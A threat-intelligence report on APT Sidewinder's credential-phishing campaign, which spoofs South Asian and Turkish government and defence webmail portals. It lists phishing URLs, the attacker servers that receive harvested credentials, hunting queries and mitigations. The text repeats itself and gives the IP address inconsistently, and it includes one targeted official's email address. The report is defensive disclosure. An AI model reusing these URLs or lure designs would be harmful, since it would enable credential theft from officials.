APT Sidewinder Spoofs Government and Military Institutions to Target South Asian Countries with Credential Harvesting Techniques

Published on

Published on

Published on

Aug 8, 2025

Aug 8, 2025

Aug 8, 2025

APT Sidewinder Abuses Netlify to Mimic Government and Military Portals in South Asia
APT Sidewinder Abuses Netlify to Mimic Government and Military Portals in South Asia
APT Sidewinder Abuses Netlify to Mimic Government and Military Portals in South Asia
APT Sidewinder Abuses Netlify to Mimic Government and Military Portals in South Asia

APT Sidewinder Spoofs Government and Military Institutions to Target South Asian Countries with Credential Harvesting Techniques

APT Sidewinder, a persistent APT group believed to originate from South Asia, has consistently targeted military and government entities across Bangladesh, Srilanka, Turkey, Nepal, Pakistan, and other neighboring countries. Sidewinder frequently leverages spear-phishing techniques involving weaponized documents and malicious links. These campaigns mimic official communication to trick victims into entering credentials on fake login pages.

Key Takeaways

  • APT SideWinder impersonates government and defense agencies across Nepal, Bangladesh, and Turkey, recreating their login interfaces using Netlify and Pages.dev to host phishing lures.

  • Spoofed Zimbra and Secure Portal Pages were made to look like official government email, file-sharing, or document upload services, prompting victims to submit credentials through fake login panels.

  • Both mailbox3-inbox1-bd.com and mailbox-inbox-bd.com were used as credential collection endpoints, indicating backend reuse and infrastructure redundancy.

  • Deployment of variants such as mailbox-inbox-bd.com/gov.ph and /pol3.php suggests redundant collection paths likely meant to ensure campaign continuity.

  • Over a dozen phishing domains were identified, each mimicking different agencies (DGDP, DGFI, Police, National Webmail, Roketsan/ASELSAN), indicating broad sectoral targeting.

Initial Discovery

The investigation starts with an observed phishing attack on Nepal's Ministry of Defense (MOD) shared by researcher "Demon" on Twitter, attributed to APT Sidewinder.

Figure 1Figure 1. Phishing Attack shared by Demon showing the Login page for "Government of Nepal"

These initial findings enabled a deeper dive into the APT Sidewinder ongoing campaign and Fake Zimbra Pages as lure.

Zimbra is a popular enterprise email platform often mimicked in phishing campaigns to steal login credentials.

Investigation

The initial investigation reveals a Fake Zimbra page (https://mail-mod-gov-np-account-file-data[.]netlify[.]app/bof.html) impersonating the Government of Nepal's Centralized Email System, hosted on Netlify, a free static hosting service often abused by threat actors to quickly spin up phishing pages.

Figure 2Figure 2. A fake Zimbra login panel hosted at mail-mod-gov-np-account-file-data[.]netlify[.]app prompted users to enter credentials that were POSTed to mailbox3-inbox1-bd[.]com.

Further investigation shows the title of the webpage as Zimbra Web Client Sign In in the HTML source code.

Figure 3Figure 3. Phishing page mimicking Zimbra login interface while retaining the legitimate 'Zimbra Web Client Sign In' title to appear authentic.

Moreover, a suspicious form submission was observed in the phishing page, which uses the POST method to send user credentials to an attacker-controlled server https://mailbox3-inbox1-bd.com/3456.php silently.

Figure 4Figure 4. Silent POST submission to https://mailbox3-inbox1-bd[.]com/3456.php observed in phishing page

Pivoting Infrastructure

This phishing domain “mailbox3-inbox1-bd[.]com” currently resolves to the IP address 146.79.118.226. At first glance, there's nothing that screams C2 traffic or known malware behavior. However, we did spot one phishing-related indicator that suggests the domain may be part of an ongoing malicious campaign. The scan did not reveal any open directories or clear indicators of compromise (IOCs), and although WHOIS information is accessible, the registration details do not appear immediately suspicious.

Figure 5Figure 5. mailbox3-inbox1-bd[.]com data found using Hunt.io intelligence

The IP address 146.70.118.226, hosted by M247 Europe SRL in Frankfurt, Germany (AS9009) and its reverse DNS points to monovm.host, a known VPS provider often associated with anonymity or abuse-friendly hosting. Forward DNS resolves to webdisk.ichigotour.com, a domain name that appears benign but could potentially be part of a misused shared hosting environment.

Figure 6Figure 6. 146.70.118.226 records found using Hunt.io intelligence

A large number of common service ports are exposed, including FTP (21), HTTP/HTTPS (80, 443), POP3 (110), IMAP (143), secure email ports (993, 995), and several cPanel/webmail management interfaces such as 2083, 2087, 2095, 2096, 2077, 2078, which are typically seen on shared hosting. The presence of SSH on a non-standard port (2041) and an unknown service running on port 52230 were also observed.

Figure 7Figure 7. Port history for 146.70.118.226 shows multiple open ports

To uncover the broader infrastructure leveraged by APT Sidewinder, we utilized HuntSQL™ (Hunt.io’s SQL-like interface that allows pivoting across massive infrastructure datasets) to pivot within an indexed web crawl dataset, starting from the previously identified suspicious domain: mailbox3-inbox1-bd.com.

HuntSQL query:

SELECT 
    *
FROM
    crawler
WHERE
    body LIKE '%mailbox3-inbox1-bd.com%'
AND timestamp gt '2025-01-01'

                
Copy

Output:

Figure 8Figure 8. SQL Query for searching similar URLs with POST Request to mailbox3-inbox1-bd[.]com

The results show that a total of 9 unique phishing URLs were identified using lures targeting Bangladesh and Turkey. These phishing pages imitate government login portals and exfiltrate credentials using POST requests to attacker-controlled infrastructure.

Here is a breakdown of the phishing URLs, their visual lures (titles), and POST requests.

URLsTitlePOST Request
https://dgdp-account-file-data-doc-procuremen.netlify.app/Dgdp Secured File Systemhttps://mailbox3-inbox1-bd.com/dgdp12.php
https://mail-mod-gov-bd-account-conf-files.netlify.app/?pdf=Zimbra Web Client Sign Inhttps://mailbox3-inbox1-bd.com/2135.php
https://mail-baf-mil-bd-account-data-files-document.pages.dev/Zimbra Web Client Sign Inhttps://mailbox3-inbox1-bd.com/2135.php
https://idef-2025-conf-data-file-tr-account-d.netlify.app/IDEF Secured File Systemhttps://mailbox3-inbox1-bd.com/idef.php
https://mail-aselsans-com-tr-account-files-da.netlify.app/error.html?pdf=mail.aselsan.com.trhttps://mailbox3-inbox1-bd.com/asln/2.php
https://drive-rokectsaans-com-tr-account-file.netlify.app/Roketsan Drivehttps://mailbox3-inbox1-bd.com/idef.php
https://idef2025-com-tr-files-drive-account.netlify.app/IDEF Secured File Systemhttps://mailbox3-inbox1-bd.com/idef11.php
https://mail-bof-gov-file-account-conf-files.netlify.app/?pdf=Zimbra Web Client Sign Inhttps://mailbox3-inbox1-bd.com/2135.php
https://drive-roketsans-com-tr-account-files.netlify.app/Roketsan Drivehttps://mailbox3-inbox1-bd.com/idef.php

Observation

  1. Domain Theming: All front-end domains are hosted on free services like Netlify and Pages.dev, commonly abused for fast, anonymous hosting.

  2. Consistent Backend: Despite different phishing lures (DGDP, Roketsan, ASELSAN, IDEF), all forms submit data to mailbox3-inbox1-bd.com, confirming it as a centralized credential collection point.

  3. Reused POST Scripts: Reuse of scripts like /2135.php and /idef.php across different phishing kits indicates automation or a template-based deployment model.

To better understand the scope of the campaign, the following table summarizes each unique phishing URL identified, along with its targeted country, impersonated organization, and a brief description of the lure used.

#Target CountryDepartment/EntityDescription
1BangladeshDGDP (Directorate General of Defence Procurement)Fake "DGDP Secured File System" page used to lure victims into uploading or accessing procurement-related documents.
2BangladeshMinistry of Defence (MoD)Mimics Zimbra login page to harvest credentials, targeting government email access.
3BangladeshBAF (Bangladesh Air Force)Another Zimbra-themed phishing page aimed at compromising military personnel's email accounts.
4TurkeyIDEF (International Defence Industry Fair)Impersonates a secure portal related to IDEF 2025, targeting Turkish defense contractors or officials.
5TurkeyASELSANMimics an aselsan.com.tr email or file access page, used to phish employees of Turkey's largest defense company.
6TurkeyROKETSANFake "Roketsan Drive" login, likely targeting file access credentials of Turkish missile manufacturer staff.
7TurkeyIDEF (International Defence Industry Fair)Another variant of IDEF phishing suggests multiple attempts to target different user flows.
8BangladeshBOF (Bangladesh Ordnance Factories)Zimbra-themed login targeting a critical defense manufacturer in Bangladesh.
9TurkeyROKETSANDuplicate "Roketsan Drive" variant using a slightly different domain; highlights reuse and variation of lures.

In order to perform title pivoting, we explored all possible titles and built a query to extract relevant records from the crawler database. Our focus was on entries with the title within a defined time frame starting from January 1, 2025, to capture recent activity and potential campaign footprints.

SELECT 
    *
FROM
    crawler
WHERE
    title == 'Dgdp Secured File System'
AND timestamp gt '2025-01-01'

                
Copy

After testing the identified page titles across broader sources, one more phishing URL was uncovered using the same visual lure, "Dgdp Secured File System". This reuse across domains points to a template-based approach, likely intended to ensure campaign continuity even if individual URLs are blocked.

Figure 9Figure 9. Pivoting Title "Dgdp Secured File System" for hunting similar webpages linked to similar infrastructure

This POST destination (mailbox-inbox-bd.com) is structurally and linguistically similar to the original collection server (mailbox3-inbox1-bd.com), suggesting a shared malicious infrastructure or backup exfiltration path used by the same threat actor attacking Bangladesh DIRECTORATE GENERAL DEFENCE PURCHASE.

URLTitlePOST Request
https://dgdp.cloud.secured.file.updatemind52.com/FOWSMNclDgdp Secured File Systemhttps://mailbox-inbox-bd.com/dgdp/109y.php

The domain “mailbox-inbox-bd[.]comshows 4 phishing URLs that also resolved to the same IP address 146.70.118.226. The scan revealed no open directories or obvious IOCs, and while WHOIS information is available, the registration details do not raise immediate suspicion.

Figure 10Figure 10. Phishing URLs related to “mailbox-inbox-bd[.]com” using Hunt.io Intelligence

Both mailbox3-inbox1-bd[.]com and mailbox-inbox-bd[.]com resolves to the same IP address 146.70.118.226, suggesting they are part of the same phishing infrastructure operated by a common threat actor.

Continuing the infrastructure hunt, a query using the URL pattern netlify.app/?pdf= revealed a new phishing page impersonating DGFI (Directorate General of Forces Intelligence), Bangladesh's military intelligence agency.

SELECT 
    *
FROM
    crawler
WHERE
    url LIKE '%netlify.app/?pdf=%'
AND url LIKE '%gov-bd%'
AND timestamp gt '2025-01-01'

                
Copy

Output:

Figure 11Figure 11. SQL query to hunt for similar URL Pattern "%netlify.app/?pdf=%" which is repeatedly seen in observed URLs

The inclusion of a .gov.bd email in the query string indicates a successful spear-phishing attempt:

https://mail-dgfi-gov-bd-accounts-file-data-d.netlify.app/?pdf=ealb.gso2.protocol@dgfi.gov.bd

Using the URL mailbox-inbox-bd.com in the body field, two additional phishing URLs were identified, both following the same Zimbra-themed lure and targeting sensitive Bangladeshi government entities:

SELECT 
    *
FROM
    crawler
WHERE
    body LIKE '%mailbox-inbox-bd.com%'
AND timestamp gt '2025-04-01'

                
Copy

Output:

Figure 12Figure 12. SQL Query for searching similar URLs with a POST Request to mailbox-inbox-bd[.]com

One spoofed the National Webmail Portal (mail.gov.bd) using a Zimbra-based lure, while the other impersonated the Bangladesh Police webmail login, both exfiltrating credentials via the attacker-controlled domain mailbox-inbox-bd.com

URLsTitlePOST Request
https://mail.gov.bd.account.file.updatemind52.com/CeqKyQXzZimbra Web Client Sign Inhttps://mailbox-inbox-bd.com/gov.ph
https://webmail.police.gov.bd.updatemind52.com/dPrSJhFPZimbra Web Client Sign Inhttps://mailbox-inbox-bd.com/pol/pol3.php
#Target CountryDepartment/EntityDescription
1BangladeshNational Webmail PortalPhishing site spoofing mail.gov.bd, with Zimbra lure and backend at mailbox-inbox-bd.com/gov.ph.
2BangladeshBangladesh PoliceSpoofed Police webmail login at webmail.police.gov.bd, using mailbox-inbox-bd.com/pol/pol3.php to exfiltrate credentials.

Attribution and Overlaps

The Sidewinder APT group continues to aggressively target government and defense sectors across South Asia, particularly Bangladesh, Sri Lanka, Nepal, and Pakistan. Recent phishing infrastructure uncovered in our hunt includes domains such as updatemind52.com, netlify.app, and pages.dev, which were designed to mimic official portals like mail.gov.bd, police.gov.bd, and dgdp.gov.bd. These domains were used to host credential-harvesting pages with highly convincing templates, some directly impersonating Zimbra Web Client interfaces.

As shown in the Sidewinder Attack by @SecAI_AI, domains like mail-mod-gov-bd-account-data-file[.]netlify[.]app and phishing URLs such as hxxps://mails.mofa.gov.np.updatemaster[.]info/mail/?_task=login highlight the group's tactic of chaining legitimate-looking subdomains with deceptive second-level domains (e.g., updatemaster[.]info).

Figure 13Figure 13. APT Sidewinder Attribution for "updatemaster[.]info" and mail-mod-gov-bd-account-data-file[.]netlify[.]app from X post

These patterns precisely align with our hunt, where we identified three domains mail.gov.bd.account.file.updatemind52[.]com, webmail.police.gov.bd.updatemind52[.]com, and dgdp.cloud.secured.file.updatemind52.com. Both the naming format and the use of attacker-controlled parent domains like updatemind52.com confirm the replication of Sidewinder's infrastructure across campaigns.

The second Sidewinder attack by @blackorbird presents additional context, displaying a phishing domain mail-defence-lk-session-out.pages[.]dev used to mimic the Sri Lankan Ministry of Defence. This mirrors the domains we uncovered, such as mail-baf-mil-bd-account-data-files-document.pages.dev and mail-aselsans-com-tr-account-files-da.netlify.app, all hosted on Netlify or Pages.dev.

Figure 14Figure 14. APT Sidewinder Attribution for "netlify[.]app" from X post showing reuse of similar infrastructure

The screenshots in the tweet show the reuse of visual elements like Zimbra login forms and official document previews, matching the behavior in our phishing samples. This consistent use of static site platforms, fake government-themed URLs, and credential-stealing POST methods reflects a broader infrastructure strategy by Sidewinder, aligning with patterns we’ve observed in prior campaigns.

Mitigation Strategies

  • Detect .php phishing pages served from domains spoofing military/gov.bd keywords

  • Block Netlify-hosted spoofed domains like *.netlify.app mimicking bd government/military services

  • Enforce MFA on all externally accessible services, especially webmail, VPNs, and government portals.

  • DNS resolutions to *.netlify.app, *.pages.dev domains containing gov/mil/army patterns.

  • HTTP requests with Zimbra login paths or anomalous User-Agent strings.

  • Security teams can write detections for unusual Zimbra login paths combined with unexpected HTTP POST behavior to external domains.

Proactively mapping attacker infrastructure remains one of the most effective ways to detect and stop threats like these before they escalate.

Conclusion

This investigation began with a phishing lure targeting Nepal's Ministry of Defense. Through infrastructure pivoting and domain analysis, the campaign's scope expanded to Bangladesh and Turkey, revealing a coordinated set of phishing attacks against government and military entities.

The consistent use of Netlify and Pages.dev, combined with centralized credential collection servers and cloned login portals, points to a sustained and scalable campaign. Attribution indicators and infrastructure overlaps reinforce previous links to APT Sidewinder.

Tracking infrastructure reuse across campaigns like this is critical. It gives defenders a practical advantage, helping detect threats early, enriching IOCs, and reducing attacker dwell time across targeted government and military environments.

APT Sidewinder Indicators of Compromise (IOCs)

URLsTitlePOST Request
https://mail.gov.bd.account.file.updatemind52.com/CeqKyQXzZimbra Web Client Sign Inhttps://mailbox-inbox-bd.com/gov.ph
https://webmail.police.gov.bd.updatemind52.com/dPrSJhFPZimbra Web Client Sign Inhttps://mailbox-inbox-bd.com/pol/pol3.php
https://dgdp.cloud.secured.file.updatemind52.com/FOWSMNclDgdp Secured File Systemhttps://mailbox-inbox-bd.com/dgdp/109y.php
https://dgdp-account-file-data-doc-procuremen.netlify.app/Dgdp Secured File Systemhttps://mailbox3-inbox1-bd.com/dgdp12.php
https://mail-mod-gov-bd-account-conf-files.netlify.app/?pdf=Zimbra Web Client Sign Inhttps://mailbox3-inbox1-bd.com/2135.php
https://mail-baf-mil-bd-account-data-files-document.pages.dev/Zimbra Web Client Sign Inhttps://mailbox3-inbox1-bd.com/2135.php
https://idef-2025-conf-data-file-tr-account-d.netlify.app/IDEF Secured File Systemhttps://mailbox3-inbox1-bd.com/idef.php
https://mail-aselsans-com-tr-account-files-da.netlify.app/error.html?pdf=mail.aselsan.com.trhttps://mailbox3-inbox1-bd.com/asln/2.php
https://drive-rokectsaans-com-tr-account-file.netlify.app/Roketsan Drivehttps://mailbox3-inbox1-bd.com/idef.php
https://idef2025-com-tr-files-drive-account.netlify.app/IDEF Secured File Systemhttps://mailbox3-inbox1-bd.com/idef11.php
https://mail-bof-gov-file-account-conf-files.netlify.app/?pdf=Zimbra Web Client Sign Inhttps://mailbox3-inbox1-bd.com/2135.php
https://drive-roketsans-com-tr-account-files.netlify.app/Roketsan Drivehttps://mailbox3-inbox1-bd.com/idef.php
https://mail-mod-gov-np-account-file-data[.]netlify[.]app/bof.htmlZimbra Web Client Sign Inhttps://mailbox3-inbox1-bd.com/2135.php
https://mail-dgfi-gov-bd-accounts-file-data-d.netlify.app/?pdf=ealb.gso2.protocol@dgfi.gov.bdZimbra Web Client Sign InN/A

Additional IOCs

IOC Type Description
mailbox3-inbox1-bd.com Domain Credential exfiltration endpoint used in POST requests from multiple spoofed government and defense login portals.
mailbox-inbox-bd.com Domain Alternate credential collection domain, also receiving POST requests from phishing pages mimicking Zimbra and secured file systems.
146.70.118.226 IP Address Hosting infrastructure linked to the Sidewinder phishing campaign, likely associated with the above credential exfiltration domains.

APT Sidewinder, a persistent APT group believed to originate from South Asia, has consistently targeted military and government entities across Bangladesh, Srilanka, Turkey, Nepal, Pakistan, and other neighboring countries. Sidewinder frequently leverages spear-phishing techniques involving weaponized documents and malicious links. These campaigns mimic official communication to trick victims into entering credentials on fake login pages.

Key Takeaways

  • APT SideWinder impersonates government and defense agencies across Nepal, Bangladesh, and Turkey, recreating their login interfaces using Netlify and Pages.dev to host phishing lures.

  • Spoofed Zimbra and Secure Portal Pages were made to look like official government email, file-sharing, or document upload services, prompting victims to submit credentials through fake login panels.

  • Both mailbox3-inbox1-bd.com and mailbox-inbox-bd.com were used as credential collection endpoints, indicating backend reuse and infrastructure redundancy.

  • Deployment of variants such as mailbox-inbox-bd.com/gov.ph and /pol3.php suggests redundant collection paths likely meant to ensure campaign continuity.

  • Over a dozen phishing domains were identified, each mimicking different agencies (DGDP, DGFI, Police, National Webmail, Roketsan/ASELSAN), indicating broad sectoral targeting.

Initial Discovery

The investigation starts with an observed phishing attack on Nepal's Ministry of Defense (MOD) shared by researcher "Demon" on Twitter, attributed to APT Sidewinder.

Figure 1Figure 1. Phishing Attack shared by Demon showing the Login page for "Government of Nepal"

These initial findings enabled a deeper dive into the APT Sidewinder ongoing campaign and Fake Zimbra Pages as lure.

Zimbra is a popular enterprise email platform often mimicked in phishing campaigns to steal login credentials.

Investigation

The initial investigation reveals a Fake Zimbra page (https://mail-mod-gov-np-account-file-data[.]netlify[.]app/bof.html) impersonating the Government of Nepal's Centralized Email System, hosted on Netlify, a free static hosting service often abused by threat actors to quickly spin up phishing pages.

Figure 2Figure 2. A fake Zimbra login panel hosted at mail-mod-gov-np-account-file-data[.]netlify[.]app prompted users to enter credentials that were POSTed to mailbox3-inbox1-bd[.]com.

Further investigation shows the title of the webpage as Zimbra Web Client Sign In in the HTML source code.

Figure 3Figure 3. Phishing page mimicking Zimbra login interface while retaining the legitimate 'Zimbra Web Client Sign In' title to appear authentic.

Moreover, a suspicious form submission was observed in the phishing page, which uses the POST method to send user credentials to an attacker-controlled server https://mailbox3-inbox1-bd.com/3456.php silently.

Figure 4Figure 4. Silent POST submission to https://mailbox3-inbox1-bd[.]com/3456.php observed in phishing page

Pivoting Infrastructure

This phishing domain “mailbox3-inbox1-bd[.]com” currently resolves to the IP address 146.79.118.226. At first glance, there's nothing that screams C2 traffic or known malware behavior. However, we did spot one phishing-related indicator that suggests the domain may be part of an ongoing malicious campaign. The scan did not reveal any open directories or clear indicators of compromise (IOCs), and although WHOIS information is accessible, the registration details do not appear immediately suspicious.

Figure 5Figure 5. mailbox3-inbox1-bd[.]com data found using Hunt.io intelligence

The IP address 146.70.118.226, hosted by M247 Europe SRL in Frankfurt, Germany (AS9009) and its reverse DNS points to monovm.host, a known VPS provider often associated with anonymity or abuse-friendly hosting. Forward DNS resolves to webdisk.ichigotour.com, a domain name that appears benign but could potentially be part of a misused shared hosting environment.

Figure 6Figure 6. 146.70.118.226 records found using Hunt.io intelligence

A large number of common service ports are exposed, including FTP (21), HTTP/HTTPS (80, 443), POP3 (110), IMAP (143), secure email ports (993, 995), and several cPanel/webmail management interfaces such as 2083, 2087, 2095, 2096, 2077, 2078, which are typically seen on shared hosting. The presence of SSH on a non-standard port (2041) and an unknown service running on port 52230 were also observed.

Figure 7Figure 7. Port history for 146.70.118.226 shows multiple open ports

To uncover the broader infrastructure leveraged by APT Sidewinder, we utilized HuntSQL™ (Hunt.io’s SQL-like interface that allows pivoting across massive infrastructure datasets) to pivot within an indexed web crawl dataset, starting from the previously identified suspicious domain: mailbox3-inbox1-bd.com.

HuntSQL query:

SELECT 
    *
FROM
    crawler
WHERE
    body LIKE '%mailbox3-inbox1-bd.com%'
AND timestamp gt '2025-01-01'

                
Copy

Output:

Figure 8Figure 8. SQL Query for searching similar URLs with POST Request to mailbox3-inbox1-bd[.]com

The results show that a total of 9 unique phishing URLs were identified using lures targeting Bangladesh and Turkey. These phishing pages imitate government login portals and exfiltrate credentials using POST requests to attacker-controlled infrastructure.

Here is a breakdown of the phishing URLs, their visual lures (titles), and POST requests.

URLsTitlePOST Request
https://dgdp-account-file-data-doc-procuremen.netlify.app/Dgdp Secured File Systemhttps://mailbox3-inbox1-bd.com/dgdp12.php
https://mail-mod-gov-bd-account-conf-files.netlify.app/?pdf=Zimbra Web Client Sign Inhttps://mailbox3-inbox1-bd.com/2135.php
https://mail-baf-mil-bd-account-data-files-document.pages.dev/Zimbra Web Client Sign Inhttps://mailbox3-inbox1-bd.com/2135.php
https://idef-2025-conf-data-file-tr-account-d.netlify.app/IDEF Secured File Systemhttps://mailbox3-inbox1-bd.com/idef.php
https://mail-aselsans-com-tr-account-files-da.netlify.app/error.html?pdf=mail.aselsan.com.trhttps://mailbox3-inbox1-bd.com/asln/2.php
https://drive-rokectsaans-com-tr-account-file.netlify.app/Roketsan Drivehttps://mailbox3-inbox1-bd.com/idef.php
https://idef2025-com-tr-files-drive-account.netlify.app/IDEF Secured File Systemhttps://mailbox3-inbox1-bd.com/idef11.php
https://mail-bof-gov-file-account-conf-files.netlify.app/?pdf=Zimbra Web Client Sign Inhttps://mailbox3-inbox1-bd.com/2135.php
https://drive-roketsans-com-tr-account-files.netlify.app/Roketsan Drivehttps://mailbox3-inbox1-bd.com/idef.php

Observation

  1. Domain Theming: All front-end domains are hosted on free services like Netlify and Pages.dev, commonly abused for fast, anonymous hosting.

  2. Consistent Backend: Despite different phishing lures (DGDP, Roketsan, ASELSAN, IDEF), all forms submit data to mailbox3-inbox1-bd.com, confirming it as a centralized credential collection point.

  3. Reused POST Scripts: Reuse of scripts like /2135.php and /idef.php across different phishing kits indicates automation or a template-based deployment model.

To better understand the scope of the campaign, the following table summarizes each unique phishing URL identified, along with its targeted country, impersonated organization, and a brief description of the lure used.

#Target CountryDepartment/EntityDescription
1BangladeshDGDP (Directorate General of Defence Procurement)Fake "DGDP Secured File System" page used to lure victims into uploading or accessing procurement-related documents.
2BangladeshMinistry of Defence (MoD)Mimics Zimbra login page to harvest credentials, targeting government email access.
3BangladeshBAF (Bangladesh Air Force)Another Zimbra-themed phishing page aimed at compromising military personnel's email accounts.
4TurkeyIDEF (International Defence Industry Fair)Impersonates a secure portal related to IDEF 2025, targeting Turkish defense contractors or officials.
5TurkeyASELSANMimics an aselsan.com.tr email or file access page, used to phish employees of Turkey's largest defense company.
6TurkeyROKETSANFake "Roketsan Drive" login, likely targeting file access credentials of Turkish missile manufacturer staff.
7TurkeyIDEF (International Defence Industry Fair)Another variant of IDEF phishing suggests multiple attempts to target different user flows.
8BangladeshBOF (Bangladesh Ordnance Factories)Zimbra-themed login targeting a critical defense manufacturer in Bangladesh.
9TurkeyROKETSANDuplicate "Roketsan Drive" variant using a slightly different domain; highlights reuse and variation of lures.

In order to perform title pivoting, we explored all possible titles and built a query to extract relevant records from the crawler database. Our focus was on entries with the title within a defined time frame starting from January 1, 2025, to capture recent activity and potential campaign footprints.

SELECT 
    *
FROM
    crawler
WHERE
    title == 'Dgdp Secured File System'
AND timestamp gt '2025-01-01'

                
Copy

After testing the identified page titles across broader sources, one more phishing URL was uncovered using the same visual lure, "Dgdp Secured File System". This reuse across domains points to a template-based approach, likely intended to ensure campaign continuity even if individual URLs are blocked.

Figure 9Figure 9. Pivoting Title "Dgdp Secured File System" for hunting similar webpages linked to similar infrastructure

This POST destination (mailbox-inbox-bd.com) is structurally and linguistically similar to the original collection server (mailbox3-inbox1-bd.com), suggesting a shared malicious infrastructure or backup exfiltration path used by the same threat actor attacking Bangladesh DIRECTORATE GENERAL DEFENCE PURCHASE.

URLTitlePOST Request
https://dgdp.cloud.secured.file.updatemind52.com/FOWSMNclDgdp Secured File Systemhttps://mailbox-inbox-bd.com/dgdp/109y.php

The domain “mailbox-inbox-bd[.]comshows 4 phishing URLs that also resolved to the same IP address 146.70.118.226. The scan revealed no open directories or obvious IOCs, and while WHOIS information is available, the registration details do not raise immediate suspicion.

Figure 10Figure 10. Phishing URLs related to “mailbox-inbox-bd[.]com” using Hunt.io Intelligence

Both mailbox3-inbox1-bd[.]com and mailbox-inbox-bd[.]com resolves to the same IP address 146.70.118.226, suggesting they are part of the same phishing infrastructure operated by a common threat actor.

Continuing the infrastructure hunt, a query using the URL pattern netlify.app/?pdf= revealed a new phishing page impersonating DGFI (Directorate General of Forces Intelligence), Bangladesh's military intelligence agency.

SELECT 
    *
FROM
    crawler
WHERE
    url LIKE '%netlify.app/?pdf=%'
AND url LIKE '%gov-bd%'
AND timestamp gt '2025-01-01'

                
Copy

Output:

Figure 11Figure 11. SQL query to hunt for similar URL Pattern "%netlify.app/?pdf=%" which is repeatedly seen in observed URLs

The inclusion of a .gov.bd email in the query string indicates a successful spear-phishing attempt:

https://mail-dgfi-gov-bd-accounts-file-data-d.netlify.app/?pdf=ealb.gso2.protocol@dgfi.gov.bd

Using the URL mailbox-inbox-bd.com in the body field, two additional phishing URLs were identified, both following the same Zimbra-themed lure and targeting sensitive Bangladeshi government entities:

SELECT 
    *
FROM
    crawler
WHERE
    body LIKE '%mailbox-inbox-bd.com%'
AND timestamp gt '2025-04-01'

                
Copy

Output:

Figure 12Figure 12. SQL Query for searching similar URLs with a POST Request to mailbox-inbox-bd[.]com

One spoofed the National Webmail Portal (mail.gov.bd) using a Zimbra-based lure, while the other impersonated the Bangladesh Police webmail login, both exfiltrating credentials via the attacker-controlled domain mailbox-inbox-bd.com

URLsTitlePOST Request
https://mail.gov.bd.account.file.updatemind52.com/CeqKyQXzZimbra Web Client Sign Inhttps://mailbox-inbox-bd.com/gov.ph
https://webmail.police.gov.bd.updatemind52.com/dPrSJhFPZimbra Web Client Sign Inhttps://mailbox-inbox-bd.com/pol/pol3.php
#Target CountryDepartment/EntityDescription
1BangladeshNational Webmail PortalPhishing site spoofing mail.gov.bd, with Zimbra lure and backend at mailbox-inbox-bd.com/gov.ph.
2BangladeshBangladesh PoliceSpoofed Police webmail login at webmail.police.gov.bd, using mailbox-inbox-bd.com/pol/pol3.php to exfiltrate credentials.

Attribution and Overlaps

The Sidewinder APT group continues to aggressively target government and defense sectors across South Asia, particularly Bangladesh, Sri Lanka, Nepal, and Pakistan. Recent phishing infrastructure uncovered in our hunt includes domains such as updatemind52.com, netlify.app, and pages.dev, which were designed to mimic official portals like mail.gov.bd, police.gov.bd, and dgdp.gov.bd. These domains were used to host credential-harvesting pages with highly convincing templates, some directly impersonating Zimbra Web Client interfaces.

As shown in the Sidewinder Attack by @SecAI_AI, domains like mail-mod-gov-bd-account-data-file[.]netlify[.]app and phishing URLs such as hxxps://mails.mofa.gov.np.updatemaster[.]info/mail/?_task=login highlight the group's tactic of chaining legitimate-looking subdomains with deceptive second-level domains (e.g., updatemaster[.]info).

Figure 13Figure 13. APT Sidewinder Attribution for "updatemaster[.]info" and mail-mod-gov-bd-account-data-file[.]netlify[.]app from X post

These patterns precisely align with our hunt, where we identified three domains mail.gov.bd.account.file.updatemind52[.]com, webmail.police.gov.bd.updatemind52[.]com, and dgdp.cloud.secured.file.updatemind52.com. Both the naming format and the use of attacker-controlled parent domains like updatemind52.com confirm the replication of Sidewinder's infrastructure across campaigns.

The second Sidewinder attack by @blackorbird presents additional context, displaying a phishing domain mail-defence-lk-session-out.pages[.]dev used to mimic the Sri Lankan Ministry of Defence. This mirrors the domains we uncovered, such as mail-baf-mil-bd-account-data-files-document.pages.dev and mail-aselsans-com-tr-account-files-da.netlify.app, all hosted on Netlify or Pages.dev.

Figure 14Figure 14. APT Sidewinder Attribution for "netlify[.]app" from X post showing reuse of similar infrastructure

The screenshots in the tweet show the reuse of visual elements like Zimbra login forms and official document previews, matching the behavior in our phishing samples. This consistent use of static site platforms, fake government-themed URLs, and credential-stealing POST methods reflects a broader infrastructure strategy by Sidewinder, aligning with patterns we’ve observed in prior campaigns.

Mitigation Strategies

  • Detect .php phishing pages served from domains spoofing military/gov.bd keywords

  • Block Netlify-hosted spoofed domains like *.netlify.app mimicking bd government/military services

  • Enforce MFA on all externally accessible services, especially webmail, VPNs, and government portals.

  • DNS resolutions to *.netlify.app, *.pages.dev domains containing gov/mil/army patterns.

  • HTTP requests with Zimbra login paths or anomalous User-Agent strings.

  • Security teams can write detections for unusual Zimbra login paths combined with unexpected HTTP POST behavior to external domains.

Proactively mapping attacker infrastructure remains one of the most effective ways to detect and stop threats like these before they escalate.

Conclusion

This investigation began with a phishing lure targeting Nepal's Ministry of Defense. Through infrastructure pivoting and domain analysis, the campaign's scope expanded to Bangladesh and Turkey, revealing a coordinated set of phishing attacks against government and military entities.

The consistent use of Netlify and Pages.dev, combined with centralized credential collection servers and cloned login portals, points to a sustained and scalable campaign. Attribution indicators and infrastructure overlaps reinforce previous links to APT Sidewinder.

Tracking infrastructure reuse across campaigns like this is critical. It gives defenders a practical advantage, helping detect threats early, enriching IOCs, and reducing attacker dwell time across targeted government and military environments.

APT Sidewinder Indicators of Compromise (IOCs)

URLsTitlePOST Request
https://mail.gov.bd.account.file.updatemind52.com/CeqKyQXzZimbra Web Client Sign Inhttps://mailbox-inbox-bd.com/gov.ph
https://webmail.police.gov.bd.updatemind52.com/dPrSJhFPZimbra Web Client Sign Inhttps://mailbox-inbox-bd.com/pol/pol3.php
https://dgdp.cloud.secured.file.updatemind52.com/FOWSMNclDgdp Secured File Systemhttps://mailbox-inbox-bd.com/dgdp/109y.php
https://dgdp-account-file-data-doc-procuremen.netlify.app/Dgdp Secured File Systemhttps://mailbox3-inbox1-bd.com/dgdp12.php
https://mail-mod-gov-bd-account-conf-files.netlify.app/?pdf=Zimbra Web Client Sign Inhttps://mailbox3-inbox1-bd.com/2135.php
https://mail-baf-mil-bd-account-data-files-document.pages.dev/Zimbra Web Client Sign Inhttps://mailbox3-inbox1-bd.com/2135.php
https://idef-2025-conf-data-file-tr-account-d.netlify.app/IDEF Secured File Systemhttps://mailbox3-inbox1-bd.com/idef.php
https://mail-aselsans-com-tr-account-files-da.netlify.app/error.html?pdf=mail.aselsan.com.trhttps://mailbox3-inbox1-bd.com/asln/2.php
